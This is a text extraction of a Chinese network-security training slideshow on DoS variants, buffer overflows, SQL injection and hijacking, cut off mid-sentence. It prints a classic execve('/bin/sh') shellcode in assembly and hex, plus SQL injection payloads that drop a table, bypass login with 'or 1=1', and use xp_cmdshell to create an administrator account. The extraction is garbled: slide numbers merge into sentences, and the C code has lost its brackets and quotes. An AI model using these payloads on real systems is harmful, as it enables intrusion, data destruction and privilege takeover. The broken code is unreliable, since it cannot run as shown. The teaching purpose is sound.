S07網(wǎng)絡(luò)安全攻擊培訓(xùn)課件(共38張)

1、網(wǎng)絡(luò)協(xié)議&網(wǎng)絡(luò)安全S07網(wǎng)絡(luò)安全攻擊主要知識(shí)點(diǎn)缺陷攻擊方法拒絕服務(wù)攻擊緩存溢出攻擊注入攻擊方法劫持攻擊方法網(wǎng)絡(luò)安全攻擊372拒絕服務(wù)攻擊Denial of Service，DoS使系統(tǒng)或網(wǎng)絡(luò)過(guò)載，使之無(wú)法繼續(xù)提供正常服務(wù)的安全攻擊特點(diǎn)：利用協(xié)議的特點(diǎn)或系統(tǒng)的漏洞攻擊者不必事先獲得對(duì)系統(tǒng)的控制權(quán)，也不是為了獲取訪問(wèn)權(quán)類型：帶寬損耗型（bandwidth consumption）因大量占用系統(tǒng)（例如一個(gè)網(wǎng)站）的網(wǎng)絡(luò)帶寬，導(dǎo)致受害者系統(tǒng)無(wú)法向其客戶提供正常服務(wù)資源匱乏型（resource starvation）使目標(biāo)服務(wù)器因宕機(jī)或沒(méi)有足夠資源（如內(nèi)存）而失去網(wǎng)絡(luò)服務(wù)能力（無(wú)法正常建立連接、響應(yīng)請(qǐng)求、

2、傳輸數(shù)據(jù)等）網(wǎng)絡(luò)安全攻擊337分布式拒絕服務(wù)攻擊Distributed DoS，DDoSDoS攻擊是攻擊者系統(tǒng)與受害者系統(tǒng)拼資源、拼性能的過(guò)程，攻擊者如果沒(méi)有足夠帶寬和計(jì)算能力，就無(wú)法耗盡攻擊對(duì)象的系統(tǒng)資源，DDoS攻擊可在同一時(shí)間調(diào)用大量不同位置的計(jì)算機(jī)向同一目標(biāo)實(shí)施攻擊網(wǎng)絡(luò)安全攻擊437DDoS攻擊類型DDoS三種技術(shù)類型：（1）利用協(xié)議漏洞Syn FloodSmurfFake IP（2）利用軟件缺陷TearDropPing-of-DeathLandICMP Fragment（3）進(jìn)行資源比拼ICMP FloodUDP FloodE-mail Bomb網(wǎng)絡(luò)安全攻擊537Syn Flood攻

3、擊同步洪水攻擊也稱為TCP同步攻擊、三次握手攻擊、半連接攻擊技術(shù)原理：基于TCP建立連接所用的三次握手機(jī)制，故意缺少第三步的ACK回復(fù)，使被叫方計(jì)算機(jī)的連接一直處于占用資源的等待狀態(tài)，直到計(jì)時(shí)器超時(shí)釋放，如果同時(shí)存在大量的半連接，計(jì)算機(jī)就會(huì)耗盡系統(tǒng)資源，無(wú)法為正常業(yè)務(wù)提供服務(wù)網(wǎng)絡(luò)安全攻擊637改進(jìn)：使用不同IP地址，使接收方難以甄別不正常流量 大量的SYN幾乎同時(shí)從傀儡機(jī)群發(fā)出，在連接等待計(jì)時(shí)器超時(shí)前突破系統(tǒng)資源上限Land攻擊登陸攻擊對(duì)Syn Flood攻擊的改進(jìn)技術(shù)原理：把SYN報(bào)文的源和目的IP地址均設(shè)置為被攻擊者的IP地址，使之向自己回復(fù)SYN-ACK和ACK報(bào)文，可能由此建立起自環(huán)的

4、空連接，占用更長(zhǎng)時(shí)間和更多資源網(wǎng)絡(luò)安全攻擊737SYN(IP1IP1)SYN(IP1IP1)SYN-ACK(IP1IP1)SYN-ACK(IP1IP1)SYN-ACK(IP1IP1)ACK(IP1IP1)IP1ACK(IP1IP1)ACK(IP1IP1)Ping of Death攻擊死亡回顯攻擊利用ICMP服務(wù)端協(xié)議機(jī)實(shí)現(xiàn)的缺陷實(shí)施DoS攻擊技術(shù)原理：假定某操作系統(tǒng)規(guī)定ICMP報(bào)文最大尺寸不超過(guò)64KB，卻不進(jìn)行嚴(yán)格檢查，攻擊者故意發(fā)送超過(guò)64KB上限的畸形ping報(bào)文（基于ICMP回顯功能），主機(jī)就會(huì)出現(xiàn)性質(zhì)嚴(yán)重的內(nèi)存分配錯(cuò)誤，導(dǎo)致崩潰、死機(jī)向目標(biāo)主機(jī)長(zhǎng)時(shí)間、連續(xù)性、大批量地發(fā)送ICMP報(bào)文

5、，將形成ICMP風(fēng)暴，使主機(jī)耗費(fèi)大量的計(jì)算資源，疲于奔命網(wǎng)絡(luò)安全攻擊837Smurf攻擊Smurf回顯攻擊死亡回顯攻擊的一種變化技術(shù)原理：向一個(gè)擁有大量主機(jī)的內(nèi)部子網(wǎng)發(fā)送欺騙性ping報(bào)文，目的IP地址設(shè)為該子網(wǎng)廣播地址，而源IP地址設(shè)為子網(wǎng)內(nèi)被攻擊主機(jī)的地址早期版本的某些型號(hào)路由器接收到該ICMP報(bào)文后予以轉(zhuǎn)發(fā)所有主機(jī)收到報(bào)文后進(jìn)行echo，結(jié)果目標(biāo)主機(jī)將同時(shí)收到大量ICMP報(bào)文反復(fù)使用Smurf攻擊，可能使子網(wǎng)因廣播風(fēng)暴而癱瘓網(wǎng)絡(luò)安全攻擊937Fraggle攻擊與Smurf類似，使用UDP的echoUDP Flood攻擊UDP洪水攻擊死亡回顯攻擊的變化之一技術(shù)原理：攻擊者隨機(jī)地向被攻擊系統(tǒng)

6、的端口發(fā)送UDP數(shù)據(jù)報(bào)文當(dāng)目標(biāo)系統(tǒng)接收到一個(gè)UDP數(shù)據(jù)報(bào)文，會(huì)根據(jù)目的端口號(hào)試圖確定正在等待（偵聽(tīng)）中的應(yīng)用程序，如果發(fā)現(xiàn)應(yīng)用程序并不存在，就根據(jù)報(bào)文中源IP地址回復(fù)一個(gè)ICMP報(bào)文，報(bào)告“目的地址無(wú)法連接”如果向目標(biāo)主機(jī)的隨機(jī)端口不斷發(fā)送隨機(jī)端口號(hào)的UDP報(bào)文，在忙于處理這些垃圾數(shù)據(jù)報(bào)文的過(guò)程中，主機(jī)性能不斷下降，直到不能提供正常服務(wù)網(wǎng)絡(luò)安全攻擊1037UDP Flood攻擊改進(jìn)網(wǎng)絡(luò)安全攻擊1137UDP的chargen和echo服務(wù)：chargen服務(wù)用于測(cè)試目的（character generator），端口號(hào)19，可對(duì)任何接收到的UDP報(bào)文反饋隨機(jī)生成的字符echo服務(wù)端口號(hào)為7，可對(duì)

7、任何接收到的數(shù)據(jù)原樣原路返回Tear Drop攻擊淚滴攻擊利用某些TCP/IP實(shí)現(xiàn)中分段重組的進(jìn)程的潛在弱點(diǎn)實(shí)施的DoS攻擊，屬于利用協(xié)議機(jī)缺陷進(jìn)行的畸形消息攻擊技術(shù)技術(shù)原理在TCP/IP協(xié)議棧實(shí)現(xiàn)中，總是假定可以信任IP報(bào)文的控制頭所包含的信息某些TCP/IP協(xié)議機(jī)（存在于一些操作系統(tǒng)相關(guān)版本中）一旦收到含有重疊偏移量的分段數(shù)據(jù)，會(huì)無(wú)法處理而崩潰攻擊者據(jù)此篡改或惡意設(shè)計(jì)IP報(bào)頭，形成錯(cuò)誤偏移量指針（offset值錯(cuò)位），發(fā)送給目標(biāo)主機(jī)，引起主機(jī)宕機(jī)而終止服務(wù)網(wǎng)絡(luò)安全攻擊1237E-mail Bomb攻擊電子郵件炸彈攻擊主要針對(duì)電子郵件服務(wù)器系統(tǒng)實(shí)施的DoS攻擊技術(shù)原理：在同一時(shí)間內(nèi)調(diào)用大量電

8、子郵件服務(wù)器對(duì)同一個(gè)目標(biāo)發(fā)送巨量電子郵件，使得該電子郵件服務(wù)器無(wú)法正常對(duì)外服務(wù)，或因超出其處理能力而崩潰網(wǎng)絡(luò)安全攻擊1337Fake IP攻擊IP欺騙攻擊利用虛假IP報(bào)文（如偽造IP地址或其他字段、偽造IP承載的TCP/UDP報(bào)文）實(shí)施的DoS攻擊，也是其他攻擊方法的組成部分之一技術(shù)原理：利用TCP的RST位來(lái)實(shí)現(xiàn)假定有一個(gè)合法用戶（IP地址為A）已經(jīng)同服務(wù)器建立了正常的連接，攻擊者構(gòu)造TCP報(bào)文，把IP源地址設(shè)定為A，向服務(wù)器發(fā)送一個(gè)帶有RST置位的TCP報(bào)文，使服務(wù)器誤解而釋放已有連接，合法用戶發(fā)送數(shù)據(jù)就因服務(wù)器失去連接而無(wú)法成功，不得不重新建立連接為提升攻擊效果，端口號(hào)應(yīng)設(shè)置為服務(wù)器的重

9、點(diǎn)應(yīng)用，例如Web服務(wù)器的80端口攻擊者可偽造大量的IP地址（例如該網(wǎng)段的所有主機(jī)地址），向目標(biāo)主機(jī)發(fā)送TCP（RST置位）報(bào)文，使服務(wù)器無(wú)法對(duì)合法用戶進(jìn)行正常服務(wù)網(wǎng)絡(luò)安全攻擊1437緩存溢出攻擊Buffer Overflow故意使核心代碼的緩沖區(qū)發(fā)生溢出，進(jìn)而接管操作系統(tǒng)的root控制權(quán)限（如莫里斯蠕蟲）緩沖區(qū)溢出錯(cuò)誤是一種非常普遍、非常隱蔽，也非常危險(xiǎn)的漏洞，程序代碼不能完全（直接）反映緩沖區(qū)溢出錯(cuò)誤，在各種操作系統(tǒng)、應(yīng)用軟件中廣泛存在如今大約80%的安全事件與溢出攻擊有關(guān)基本技術(shù)原理：在軟件技術(shù)上，如果對(duì)緩沖區(qū)的邊界控制不嚴(yán)格，甚至不加以控制，一旦越界，會(huì)使數(shù)據(jù)覆蓋其他數(shù)據(jù)區(qū)域，引起不可

10、預(yù)料的錯(cuò)誤數(shù)據(jù)出錯(cuò)運(yùn)行代碼被破壞棧內(nèi)寄存器被破壞形參和實(shí)參被破壞棧內(nèi)返回地址錯(cuò)誤網(wǎng)絡(luò)安全攻擊1537操作系統(tǒng)運(yùn)行程序的典型緩存結(jié)構(gòu)網(wǎng)絡(luò)安全攻擊1637void func(arg1,arg2,argn)local-var1;local-var2; local-vark; program 危險(xiǎn)函數(shù)實(shí)例網(wǎng)絡(luò)安全攻擊1737void copy8(char * str)char buf8;strcpy(buf, str);printf(“%sn”,buf);main( )copy8(“dangrous”);main( )copy8(“safe-string”);“safe-string”返回地址 Ret

11、urn AddrEBPbuf8=safe-strEBPESP進(jìn)棧ing例：存在安全漏洞的系統(tǒng)函數(shù)strcpy( )緩存溢出示例網(wǎng)絡(luò)安全攻擊1837C源程序：x打印輸出是什么？void main( ) int x; x = 0; pass(1, 2, 3); x = 1; printf(%d, x); int pass(int a, int b, int c) char buffer16; int sum; int *ret; ret = buffer + 20; (*ret) += 10; sum = a + b + c; return sum; 緩存溢出示例分析網(wǎng)絡(luò)安全攻擊1937C源程序：

12、void main( ) int x; x = 0; pass(1, 2, 3); x = 1; printf(%d,x); int pass(int a, int b, int c) char buffer16; int sum; int *ret; ret = buffer + 20; (*ret) += 10; sum = a + b + c; return sum; 匯編被跳過(guò)的指令被跳過(guò)的指令緩存溢出的利用網(wǎng)絡(luò)安全攻擊2037具有低權(quán)限的用戶執(zhí)行程序恢復(fù)原有權(quán)限可能的方法一：在程序執(zhí)行的過(guò)程中，把目標(biāo)程序“植入”高權(quán)限區(qū)域，再跳轉(zhuǎn)到目標(biāo)程序并執(zhí)行。可能的方法二：在操作系統(tǒng)未恢復(fù)用戶權(quán)

13、限時(shí)，改變正常運(yùn)行過(guò)程，跳轉(zhuǎn)到目標(biāo)程序并執(zhí)行。獲取高級(jí)用戶甚至超級(jí)用戶權(quán)限從而完全控制目標(biāo)主機(jī)正常流程Trick：程序調(diào)用的“庫(kù)函數(shù)”即系統(tǒng)函數(shù)通常具有系統(tǒng)最高權(quán)限。操作系統(tǒng)Shell技術(shù)含義網(wǎng)絡(luò)安全攻擊2137OS用戶shell用戶shell命令控制臺(tái)可層次嵌套繼承前一層權(quán)限Shell溢出攻擊準(zhǔn)備網(wǎng)絡(luò)安全攻擊2237#include void main()char *name2;name0 = /bin/sh;name1 = NULL;execve(name0,name,NULL);exit(0);0 x80482c7 :jmp 0 x80482e8 0 x80482c9 :pop %esi

14、0 x80482ca :mov %esi,0 x8(%esi)0 x80482cd :xor %eax,%eax0 x80482cf :mov %al,0 x7(%esi)0 x80482d2 :mov %eax,0 xc(%esi)0 x80482d5 :mov $0 xb,%al0 x80482d7 :mov %esi,%ebx0 x80482d9 :lea 0 x8(%esi),%ecx0 x80482dc :lea 0 xc(%esi),%edx0 x80482df :int $0 x800 x80482e1 :xor %ebx,%ebx0 x80482e3 :mov %ebx,%ea

15、x0 x80482e5 :inc %eax0 x80482e6 :int $0 x800 x80482e8 :call 0 x80482c9 0 x80482ed :.string “/bin/sh”char shellcode =0 x80482c7:0 xeb 0 x2f 0 x5e 0 x89 0 x76 0 x08 0 x31 0 xc00 x80482cf:0 x88 0 x46 0 x07 0 x89 0 x46 0 x0c 0 xb0 0 x0b0 x80482d7:0 x89 0 xf3 0 x8d 0 x4e 0 x08 0 x8d 0 x56 0 x0c0 x80482df

16、:0 xcd 0 x80 0 x31 0 xdb 0 x89 0 xd8 0 x40 0 xcd0 x80482e7:0 x80 0 xe8 0 xdc 0 xff 0 xff 0 xff/b0 x80482ff:in/sh（該程序功能為執(zhí)行name指定的命令行命令；本例為打開(kāi)新的shell）Shell溢出攻擊代碼網(wǎng)絡(luò)安全攻擊2337目標(biāo)：拷貝完成后，“buffer地址”正好填充進(jìn)棧內(nèi)的“返回地址”位置思考：為何用strcpy()而 非直接復(fù)制？Shell溢出攻擊技巧網(wǎng)絡(luò)安全攻擊2437要求： 攻擊代碼為連續(xù)的； 地址指向攻擊代碼起始位置； 地址恰好覆蓋“返回地址”。技巧： 多個(gè)代碼起始地址，

17、提高命中率； 代碼以空指令開(kāi)始，提高命中率； 嘗試不同的組合結(jié)構(gòu)，適應(yīng)不同的棧結(jié)構(gòu)。注入攻擊Injection Attack在網(wǎng)絡(luò)應(yīng)用系統(tǒng)用戶訪問(wèn)界面（例如瀏覽器）上輸入事先嚴(yán)密設(shè)計(jì)的內(nèi)容（惡意代碼），并達(dá)到攻擊目的注入攻擊往往針對(duì)SQL（Structured Query Language，結(jié)構(gòu)化查詢語(yǔ)言）數(shù)據(jù)庫(kù)存取操作，因此常稱為SQL注入攻擊數(shù)據(jù)庫(kù)是網(wǎng)絡(luò)信息系統(tǒng)的核心，如果數(shù)據(jù)庫(kù)系統(tǒng)受到攻擊，不論是引起數(shù)據(jù)泄漏，還是數(shù)據(jù)遭到篡改、偽造、刪除，對(duì)系統(tǒng)而言影響必然是最致命的技術(shù)原理：數(shù)據(jù)庫(kù)訪問(wèn)采用SQL語(yǔ)句實(shí)現(xiàn)數(shù)據(jù)表單、數(shù)據(jù)字段的存取操作部分SQL語(yǔ)句在邏輯上是正確的，但在網(wǎng)絡(luò)環(huán)境中卻可能被人

18、利用，成為系統(tǒng)安全的漏洞網(wǎng)絡(luò)安全攻擊2537數(shù)據(jù)庫(kù)訪問(wèn)系統(tǒng)結(jié)構(gòu)網(wǎng)絡(luò)安全攻擊2637Internet客戶端軟件訪問(wèn)瀏覽器訪問(wèn)客戶端軟件指定訪問(wèn)方式，不可修改URL或腳本編程訪問(wèn)方式，存在修改可能應(yīng)用服務(wù)器和數(shù)據(jù)庫(kù)應(yīng)用服務(wù)器和數(shù)據(jù)庫(kù)Web服務(wù)器用戶終端SQL查詢操作實(shí)例網(wǎng)絡(luò)安全攻擊2737var CityName;CityName = Request.form (CityName);var sql = select * from OrdersTable where CityName = + CityName + ;若CityName輸入Shanghaiselect * from OrdersTab

19、le where CityName = Shanghai （查詢訂單數(shù)據(jù)表OrdersTable中所有有關(guān)Shanghai的記錄）SQL注入攻擊實(shí)例網(wǎng)絡(luò)安全攻擊2837var CityName;CityName = Request.form (CityName);var sql = select * from OrdersTable where CityName = + CityName + ;若CityName輸入Shanghai ; drop table OrdersTable - -select * from OrdersTable where CityName = Shanghai ;

20、 drop table OrdersTable - - 分號(hào)（;）表示一個(gè)操作的結(jié)束和另一個(gè)操作的開(kāi)始；雙連字符（-）指示當(dāng)前行余下的部分是注釋內(nèi)容，應(yīng)該忽略數(shù)據(jù)庫(kù)將首先檢索出OrdersTable中有關(guān)Shanghai的所有記錄，然后將執(zhí)行drop table命令，即執(zhí)行刪除OrdersTable數(shù)據(jù)表！SQL查詢操作實(shí)例網(wǎng)絡(luò)安全攻擊2937Select * from users where username= username.Text and password= password.Text 輸入username和password可用以驗(yàn)證用戶合法性SQL注入攻擊實(shí)例網(wǎng)絡(luò)安全攻擊3037S

21、elect * from users where username= username.Text and password= password.Text 若username輸入or 1 = 1 -Select * from users where username= or 1 = 1 - - and password= anything 由于1=1恒成立，不論password輸入什么，用戶驗(yàn)證總是得到通過(guò)！SQL查詢操作實(shí)例網(wǎng)絡(luò)安全攻擊3137相關(guān)SQL語(yǔ)句如：select * from 表名 where 字段=XXSQL注入攻擊實(shí)例網(wǎng)絡(luò)安全攻擊3237user為SQL數(shù)據(jù)庫(kù)內(nèi)置變量，為當(dāng)前連

22、接的用戶的用戶名user類型為nvarchar（不同于int類型）user與整數(shù)型（int）的0相比較，系統(tǒng)將嘗試把user轉(zhuǎn)換為intuser轉(zhuǎn)換必定出錯(cuò)，則報(bào)錯(cuò)將nvarchar值“abc”轉(zhuǎn)換為int時(shí)發(fā)生語(yǔ)法錯(cuò)誤！由此獲取到當(dāng)前連接的用戶的用戶名“abc”！變化獲取數(shù)據(jù)庫(kù)名：若為“sa”則為超級(jí)用戶！SQL注入攻擊實(shí)例網(wǎng)絡(luò)安全攻擊3337http:/site/url.asp?id=1;exec master.xp_cmdshell “net user name password /add” - -執(zhí)行存儲(chǔ)過(guò)程xp_cmdshell以調(diào)用系統(tǒng)命令net，新建了name和password的賬號(hào)！http:/site/url.asp?id=1;exec master.xp_cmdshell “net localgroup name administrators /add” - -將新建的賬號(hào)name加入管理員組！劫持攻擊Kidnaping Attack攻擊者通過(guò)插入網(wǎng)絡(luò)通信系統(tǒng)，改變?cè)械臄?shù)據(jù)流（路由）并截取數(shù)據(jù)，達(dá)到竊取信息或篡改信息的目的典型劫持攻擊方法：中間人攻擊黑洞攻擊蟲洞攻擊網(wǎng)絡(luò)安全攻擊3437Middle-man攻擊中間人攻擊劫持攻擊的一種，攻擊者隔離通信雙